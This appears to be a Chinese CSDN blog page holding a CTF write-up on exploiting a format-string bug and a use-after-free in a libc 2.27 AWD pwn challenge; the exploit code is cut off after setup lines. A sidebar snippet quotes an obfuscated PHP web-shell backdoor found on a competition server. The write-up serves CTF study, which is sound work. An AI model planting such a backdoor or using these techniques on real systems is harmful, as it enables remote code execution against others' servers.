ciscn 华中赛区分区赛 awd pwn2

最新推荐文章于 2025-09-12 11:29:03 发布

原创

最新推荐文章于 2025-09-12 11:29:03 发布 · 584 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#安全

该博客详细介绍了如何利用C程序中一个包含格式化字符串漏洞和Use-After-Free（UAF）漏洞的libc2.27库。作者通过记录、删除、浏览和重写操作展示了漏洞利用过程，并给出了exploit代码，最终实现对系统调用的控制。

在这里插入图片描述
libc 2.27

record
在这里插入图片描述
结构还是比较清晰的。

申请了一个大小为0x110的chunk。前0x10是mark，后0x100是msg。
在最后八个字节那里，维护了一个单链表。

scrape
在这里插入图片描述也就是删除，但是在删除链表尾的时候有uaf。

browser
在这里插入图片描述
就是输出，上面花里胡哨的也没啥用，然后有个格式化字符串漏洞。

rewrite
在这里插入图片描述可以重新写一下。

backdoor
在这里插入图片描述
也是在做一个输出。

漏洞有俩，一个格式化字符串，一个uaf。
uaf利用半天利用不出来，格式化字符串倒是简单。

exp

from pwn import*

context.log_level = "debug"

r = process("./2")

libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

yongbaoii

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ciscn2021东北赛区分区赛

kingdring的博客

06-15

737

ciscn2021东北赛区分区赛 ++Spirit k1ling 感谢Dazz1e大佬陪我看了很久hh summary 3720pt,rank11 晋级名单还没出，不过大概率是前10进，正好卡掉了，就差一步到罗马，真的意难平… 但是想想自己菜成这样全靠gs带也就释然了一些这东西就跟S赛一样，今年没了你就要咽下所有的不甘，然后更加努力，等着明年杀回来 ++Spirit绝不会止步于此今年进第二轮之后改了个名，k某人想去ciscn决赛，去决赛之前不改名，不管哪年，flag立这了。 misc 签到工具

ciscn-2022 东北赛区分区赛 RE-hana

qq_34010404的博客

07-20

734

逆向太菜了，当时没逆出来，今天复现一下，虽然出了，但是是下断点断出来的…

参与评论您还未登录，请先登录后发表或查看评论

CISCN分区赛华东北部分wp

Htt9999的博客

06-27

906

华东北分区赛部分wp

走进CTF：网安人的offer之路

最新发布

yy1715713348的博客

09-12

1087

CTF，全称为“Capture The Flag”，直译为“夺旗赛”，在网络安全领域中指网络安全技术人员之间进行技术竞技的一种比赛形式。参赛选手需在规定时间内解决一系列安全挑战，找出隐藏的“flag”(通常是格式为flag{xxx}的字符串)。

ciscn 2022 华东北分区赛pwn blue

z1r0的博客

07-02

1146

开了沙盒最简单的解法还是借助environ来控制ret地址，然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址，因为show功能只能使用一次。这一题的漏洞点是一次性的uaf漏洞，在666功能下我们首先先借助这一次性的uaf泄露出libc。还是填满tcache，只不过下一个进unsorted bin的时候利用666这个uaf功能。接下来思考一下如何泄露出environ里面的值，show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露，将flags

CISCN2021 西北赛区分区赛 Web xb_web_flask_trick

feng的博客

06-08

993

前言 6.5号去了兰州打了分区赛，4道Web出了web1和web4，web2和web3都不会。这题flask是web3，讲道理对我这种对flask不熟悉的弟弟来说还是挺难的，比赛的时候只有西电的一个队伍出了。今天晚上在学长的帮助下终于出了这道题，也是学到了很多的东西。源码 import os from flask import Flask, request, abort, session app = Flask(__name__) app.config["SECRET_KEY"] = os.urand

ciscn 华中赛区分区赛 awd pwn1

yongbaoii的博客

07-15

631

罕见的有保护没有都开。输入是input sb是第一个：：后面的第一个事sc sc后面第一个回车是sd sd后面第一个又是input E0存放着input E8放着sc 所以其实也就是回车为分界，一组一个回车。：又将每一组分开，分别存放在E0,E8。有个strcasecmp函数头文件：#include <string.h> 定义函数：int strcasecmp (const char *s1, const char *s2); 函数说明：strcasecmp()用来比较参数s1 和.

CISCN 2023 华中分区赛 awd pwn——tsh

CoLin的pwn小屋

07-10

2604

CISCN 2023 awd pwn 分析

awd的批量脚本 pwn_CTF线下赛AWD套路小结

weixin_39784972的博客

12-20

2039

CTF线下赛AWD套路小结本文已在先知社区发表，欢迎访问，链接h最近打了2场CTF线下赛，把AWD模式中的一些小套路做一些总结，本人web狗，二进制部分就不班门弄斧了。一、AWD模式简介AWD：Attack With Defence，比赛中每个队伍维护多台服务器，服务器中存在多个漏洞，利用漏洞攻击其他队伍可以进行得分，修复漏洞可以避免被其他队伍攻击失分。一般分配Web服务器，服务器(多数为Linu...

精选资源

BugKu 2021 CTF AWD 排位赛真题 S2 AWD排位赛-8.zip

12-07

BugKu 2021 CTF AWD 排位赛真题

ciscn2021 西北分区赛部分pwn

mishixiaodai的博客

06-07

327

xb_pwn_easy 分析发现是道整数溢出的题，unsigned int8最大数为255，当输入的数字超出255时就会发生溢出。但当时做题我将v4输为0，也可以造成溢出，原因是read的第三个参数v4-1=-1，又read的第三个参数类型是size_t，当输入负值时，会将其转换为无符号数。利用整数溢出漏洞，可以覆盖age、email、phone，可以将email覆盖为函数的got地址，这样就可以获得函数的地址并且得到libc的基地址。修改puts函数的got表。一开始我将phone覆盖为puts_

ciscn 2022 华东北分区赛pwn bigduck

z1r0的博客

07-01

943

这个是2.33下的，2.33下有free_hook 和 malloc_hook。这题开启了沙盒，禁用了execve 所以考虑orw攻击方法。这里有一个小坑点，2.33下通过unsorted bin泄露的时候，main_arena那里的低字节是\x00，所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路，第一种借助environ泄露出stack然后改edit的ret为orw即可，第二种劫持hook为万能gadget（直接拿2

2022 ciscn 东北赛区分区赛 部分 wp

热门推荐

qq_23321269的博客

06-19

1万+

2022 ciscn 东北分区赛 部分wp

2021 ciscn 华中赛区分区赛 pwn note

yongbaoii的博客

09-02

511

libc 2.31 保护是都拉上的。刚开始有个花指令，通过一定的调整，再反汇编，就得到了正确的结果。可以看到除了必要的初始化setbuf之外还将4050的地方清空了。后面我们会看到4050就是存放地址的地方。 add 看一下content的输入很明显的off by one。整体结构还是比较清晰的，最多申请三个chunk。 free 清理的很干净。 show show也是正常泄露。很明显的off by one，我们的常规思路也就是overlap或者unlink。因为这里泄露不了基地址，所以我

一次AWD比赛记录

luoluopeach

10-10

659

BEGIN ssh -p 2201 ctf@118.89.227.105 备份文件以后，首先D盾扫一波使用defence上waf 开始修洞 .config_common.php 这是一个已知后门 <?php error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[520]); ?> base64_decode：YXN

2020 ciscn 东北分区赛 re题解

Air_cat的博客

09-19

508

唉，居然没师傅出re题，悲伤此题考点在于抓取或解密出迷宫，这里我用的原函数进行生成，改改几个定义就可以输出迷宫了： #include<stdio.h> #include<string.h> #include<windows.h> #include<string.h> #include<tchar.h> #include<stdint.h > //#+OXJ xnB1 QWT4 9cnW cGFB ZOjn yfZo ZV1m 7+/

CISCN国赛线下AWD总结与反思

qq_53755216的博客

06-28

1124

整体总结关于比赛实战起来和练习还是有很大的不同到了比赛一上来遇到了3台web 有点手忙脚乱的比赛是两个cms + 一个game 由于没有经验一时不知道从哪里入手或从哪里去打导致对团队做出的贡献很小有点遗憾所以要好好练一练代码审计并且提高一下运维的技术？关于攻击和防御我们发现机器很快被上了马于是决定把机全部宕掉我觉得上来备份完后可以手动宕机然后慢慢修这里有个小问题就是数据库的备份问题这次比赛没有很简单能够打数据库的洞所以数据库没被打并且我们第一天三个web一直宕机导致没

记录复现一下第一次awd

qq_63928796的博客

02-09

839

之前没打过awd，这次学长组织了一场awd娱乐赛，两个web一个pwn，还有一个黑盒，只会web，第一次啥也不会瞎打，被打烂了，不会写脚本，手交flag的感觉真“不错”，感觉awd还是比ctf好多了(虽然啥也不会)，浅浅复现一下。

CISCN2021_华南初赛_记录

ScyLamb的博客

05-16

1422

easy_sql hint:一个简单的sql注入题目打开一个登录框，随便测试下，发现报错了直接报错注入Payload打一波失败，回显no，开始跑字典过滤了 column和可以获取表名的表如： [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pQ9yJBow-1621160008407)(image/国赛.image/image-20210515151503088.png)] 尝试盲猜表名【后面发现sqlmap爆破表名也可以跑出来】最后成功两个 users,fla

awd pwn修复

03-08

针对AWD（Attack-Defense Competition）环境下的PWN类漏洞，通常涉及内存管理不当、缓冲区溢出等问题。对于这些类型的漏洞，有效的修复措施可以从多个角度入手。 #### 1. 防范缓冲区溢出攻击为了防止`strcpy`函数...